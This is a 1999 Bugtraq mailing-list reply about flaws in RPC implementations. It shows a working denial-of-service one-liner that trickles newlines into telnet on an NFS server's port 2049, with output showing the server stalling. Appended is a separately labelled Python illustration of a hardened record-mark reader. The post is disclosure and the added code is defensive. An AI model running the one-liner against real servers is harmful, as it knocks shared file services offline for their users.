[10254] in bugtraq


Re: KKIS.08041999.001.b - security raport - flaws in rpc part of

daemon@ATHENA.MIT.EDU (Peter van Dijk)
Fri Apr 16 16:40:43 1999

Mail-Followup-To: BUGTRAQ@NETSPACE.ORG
Date: 	Thu, 15 Apr 1999 21:46:34 +0200
Reply-To: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
From: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <Pine.LNX.4.10.9904141520310.17771-100000@nova.kki.krakow.pl>;
              from Lukasz Luzar on Wed, Apr 14, 1999 at 03:26:14PM +0200

On Wed, Apr 14, 1999 at 03:26:14PM +0200, Lukasz Luzar wrote:
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
>                            ###  ###  ###  ###  ###
>                            ### ###   ### ###   ###
>                            ######    ######    ###
>                            ### ###   ### ###   ###
>                            ###  ###  ###  ###  ###
>
>                                S E C U R I T Y
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> KKI Security Team                         Cracow Commercial Internet, Poland
> http://www.security.kki.pl                http://www.kki.pl
> mailto:security@security.kki.pl           mailto:biuro@kki.pl
>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> Report title        : Lack of RPC implementation in libc libraries
>                       and how it affects, for example, portmap.

A much easier DoS is obtained by connecting to an RPC port and just sending some random
(most will do) garbage every 5 seconds. Note that this _does_ affect the UDP services
in the same daemons. I have seen this bug in _every_ RPC implementation, with a few
exceptions: mcserv (which does not really use the RPC protocol, only the portmapper),
Sun's own nfsd [although their portmapper is buggy], and NetApp boxes.

To wit:
[root@koek] ~# ( while true ; do echo ; sleep 5 ; done ) | telnet zopie 2049
Trying 10.10.13.1...
Connected to zopie.attic.vuurwerk.nl.
Escape character is '^]'.
NFS server zopie not responding, still trying.
Connection closed by foreign host.
[root@koek] ~# NFS server zopie OK.

Right after I started the telnet, I switched to another VC and did ls /zopie, the
NFS-mounted disk. The ls did not give any output until I Ctrl-C'ed the telnet.

Greetz, Peter
--
| 'He broke my heart,    |                              Peter van Dijk |
     I broke his neck'   |                     peter@attic.vuurwerk.nl |
   nognixz - As the sun  |        Hardbeat@ircnet - #cistron/#linux.nl |
                         | Hardbeat@undernet - #groningen/#kinkfm/#vdh |
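Added illustration for this thread (not code from Peter's post or from any of the daemons he names): a toy model of the ONC RPC record-marking layer over TCP (4-byte header, high bit = last fragment, low 31 bits = fragment length). It assumes, as one plausible mechanism for the stall described above, a single-threaded daemon that performs a blocking read of each record; the post itself does not say why the daemons hang. The cap value, timeout and function names are constructed for the example. It shows what four newline bytes look like when parsed as a record mark, and a hardened reader that gives up on an oversized length or an idle peer instead of blocking forever.

```python
"""Toy model of RPC record marking: why a blocking reader stalls on junk,
and a reader with a size cap plus inactivity deadline that does not.

Added example for this thread, not the original post's code.  The record
mark layout follows RFC 1831; the cap, timeout and helper names are
constructed for the example.
"""
import socket
import struct

LAST_FRAGMENT = 0x80000000
MAX_FRAGMENT = 1 << 20   # constructed cap; a real service sizes it to its largest legal call


def parse_record_mark(header: bytes):
    """Split a 4-byte record-mark header into (is_last, fragment_length)."""
    if len(header) != 4:
        raise ValueError("record mark must be exactly 4 bytes")
    (word,) = struct.unpack("!I", header)
    return bool(word & LAST_FRAGMENT), word & 0x7FFFFFFF


def read_exact_blocking(sock, n):
    """The naive pattern: loop on recv() with no deadline.  A peer that
    trickles a byte every few seconds keeps this loop, and therefore a
    single-threaded daemon, stuck for as long as it likes."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed mid-record")
        buf += chunk
    return buf


def _read_exact_with_timeout(sock, n):
    """Same loop, but the socket carries an idle timeout so recv() raises
    socket.timeout when the peer goes quiet."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed mid-record")
        buf += chunk
    return buf


def read_fragment_hardened(sock, idle_timeout=2.0, max_len=MAX_FRAGMENT):
    """Read one fragment; fail fast on an implausible length or a silent
    peer.  The caller drops the connection on any exception, so one slow
    client cannot hold the service for everyone else."""
    sock.settimeout(idle_timeout)
    is_last, length = parse_record_mark(_read_exact_with_timeout(sock, 4))
    if length > max_len:
        raise ValueError(f"fragment length {length} exceeds cap {max_len}")
    return is_last, _read_exact_with_timeout(sock, length)


def demo_garbage_header():
    """Four newline bytes (one 'echo' per period) parsed as a record mark:
    not the last fragment, and a length of 0x0A0A0A0A (~168 MB)."""
    return parse_record_mark(b"\n\n\n\n")


def demo_hardened_reader_gives_up(junk: bytes, idle_timeout=0.2):
    """Push `junk` through a socketpair and then stay silent, as a trickling
    peer does.  Returns which guard fired: 'oversized', 'timeout', 'closed',
    or 'no error' if a full fragment was read."""
    client, server = socket.socketpair()
    try:
        client.sendall(junk)
        try:
            read_fragment_hardened(server, idle_timeout=idle_timeout)
        except socket.timeout:
            return "timeout"
        except ValueError:
            return "oversized"
        except ConnectionError:
            return "closed"
        return "no error"
    finally:
        client.close()
        server.close()


if __name__ == "__main__":
    print("newlines as record mark:", demo_garbage_header())
    print("junk header:", demo_hardened_reader_gives_up(b"\n\n\n\n"))
    print("valid header, no payload:", demo_hardened_reader_gives_up(b"\x00\x00\x00\x10"))
```

The two demo calls cover both guards: the newline header trips the length cap immediately, while a well-formed header followed by silence trips the idle deadline. The cap and the timeout work only if the accept loop then closes that connection and moves on; a per-connection timeout on a daemon that still serves one socket at a time merely bounds the outage rather than removing it.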
